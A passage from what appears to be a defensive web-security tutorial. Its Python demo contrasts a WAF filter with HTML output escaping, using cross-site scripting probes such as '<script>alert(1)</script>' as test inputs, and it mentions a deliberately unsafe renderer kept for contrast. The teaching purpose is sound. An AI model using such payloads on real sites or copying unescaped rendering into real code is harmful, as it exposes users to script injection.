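    return "<p>Hello, %s!</p>" % html.escape(name, quote=True)


def handle(params, waf_enabled=True):
    """Simulated request path: optional WAF check, then the safe renderer."""
    if waf_enabled:
        blocked, rule_id, param = inspect_request(params)
        if blocked:
            return 403, "blocked by rule %s on parameter '%s'" % (rule_id, param)
    return 200, render_safe(params.get("name", ""))


if __name__ == "__main__":
    for name in ["Alice", "O'Brien", "<script>alert(1)</script>", "<img src=x>"]:
        print(handle({"name": name}))
```

The run shows the two layers doing different jobs: the filter rejects the request that matches a signature and logs which rule and parameter fired, while a value the narrow rules do not match, such as `<img src=x>`, still reaches the page as inert text because `render_safe` escapes it. That is the sense in which a WAF is a shield for the application you already have and output encoding is the prevention; `render_unsafe` is left in only to show what the shield is protecting.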

The Hacka Man